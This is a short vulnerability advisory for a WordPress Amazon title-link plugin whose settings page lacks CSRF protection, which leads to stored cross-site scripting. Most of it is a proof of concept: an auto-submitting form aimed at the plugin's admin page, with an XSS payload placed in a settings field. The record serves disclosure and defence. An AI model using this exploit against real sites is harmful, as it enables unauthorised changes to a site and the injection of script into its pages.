The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack and lead to Stored Cross-Site Scripting due to the lack of sanitisation and escaping
<form id="test" action="https://example.com/wp-admin/options-general.php?page=amazon-einzeltitellinks.php" method="POST">
<input type="text" name="BenutzerID" value='hacked"><img src onerror=alert(/XSS/)>'>
<input type="text" name="amazon_einzeltitel_links_name" value="">
<input type="text" name="amazon_einzeltitel_rechts_name" value="">
<input type="text" name="amazon_einzeltitel_none_name" value="">
<input type="text" name="amazon_einzeltitel_link_name" value="">
<input type="text" name="amazon_einzeltitel_rahmen_name" value="">
<input type="text" name="amazon_einzeltitel_titelfarbe_name" value="">
<input type="text" name="amazon_einzeltitel_preisfarbe_name" value="">
<input type="text" name="amazon_einzeltitel_hintergrundfarbe_name" value="">
<input type="text" name="amazonUpdate" value="Speichern">
</form>
<script>
document.getElementById("test").submit();
</script> Daniel Ruf
Daniel Ruf
Yes
2022-05-30 (about 11 months ago)
2022-05-30 (about 11 months ago)
2023-02-25 (about 2 months ago)